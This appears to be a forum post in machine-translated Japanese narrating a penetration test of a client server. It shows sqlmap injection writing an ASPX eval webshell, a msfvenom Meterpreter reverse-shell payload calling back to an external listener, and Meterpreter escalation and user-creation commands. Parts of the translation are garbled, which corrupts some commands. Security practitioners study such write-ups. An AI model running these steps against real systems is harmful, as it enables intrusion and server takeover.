Jump to content

0x00はじめに

侵入プロジェクトが実施されたとき、顧客は1つのIPのみを提供しました。ルーキーとして、私は遠く離れて航海し始めました。

0x01情報収集

NMAPはポートをスキャンし、高ビットポートのスキャンに注意を払い、予期しない利益につながることがよくあります。

弱いパスワードはログインしようとします。

簡単な要約。

image.png

0x03脆弱性検出

バックグラウンドテストにログインし、両方のシステムにSQLインジェクションが存在することを発見しました。

ポート8000のクロッカスシステムにファイルをダウンロードする脆弱性も見つかりました。

image.png

ログのダウンロードであることが判明しました。クリックして、ページに絶対的なパスがあることを発見します。

image.png

わかりました!絶対パスを収集します。

image.png

現在のアイデアは次のとおりです。

SQLインジェクションと組み合わせた絶対的なパスの前提で、SQLMAPの-SQL -Shellを使用してトロイの木馬を書き込もうとします。

0x04脆弱性

この絶対的なパスを詳しく見てみましょう。それを見つめると奇跡的な効果があると聞いた。 (笑う)

image.png

どこかでWCMS4.0を見たと思います。

image.png

それは正しい。ポート12055で、バックグラウンドにログインします

バックグラウンドでSQLインジェクションを使用して、シェルを書き込むことができます。

image.png

SQLインジェクションポイントは、ほぼ検索場所にあります。

パケットをインターセプトし、post.txtとして保存します。 SQLMAPを使用して注入を開始します。

image.png

image.png

注入、DBA許可、および絶対パスがあります。シェルのワンストップの準備ができました。

0x05 webshell

トロイの木馬にaspxの書き込みを開始します。

「%@ページ言語='javascript'%eval(request.item ['pass']);% 'into outfile' c: //プログラムファイル(x86)//cms server //wcms4.0 //x.aspx 'image.png

問題ありません、訪問してください。

image.png

ニース!

包丁の接続。

image.png

0x06制御サーバー

最初にこのサーバーに関する情報を収集します

image.png

image.png

サーバーはイントラネットで実行され、ここではMSFホースを使用してシェルをバウンスして転送することを選択します。

外部ネットワークにメタプロイトを構築する方法について。推奨記事:

http://www.sqlsec.com/2018/03/cloud.html#more

MSF馬を生成します

MSFVENOM -P Windows/X64/MeterPreter/Reverse_tcp Lhost=xx.xx.xx.xx lport=2333 -f exe road.exxx.xx.xx.xxはパブリックネットワークサーバーです

2333はパブリックネットワークポートです

image.png

生成されたMSF馬を中国の包丁を通してブロイラーにアップロードします。

外部ネットワーク上のMetaSploitは、監視の構成を開始します

Exploit/Multi/ハンドルを使用します

ペイロードを設定します

Windows/x64/meterpreter/reverse_tcp

LHOST 127.0.0.1を設定します

走る

image.png

image.png

いくつかのメータープレターコマンドを単純に実行します

GetUID電流権限

システムを取得して権利を引き上げます

getgui -uを実行します

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...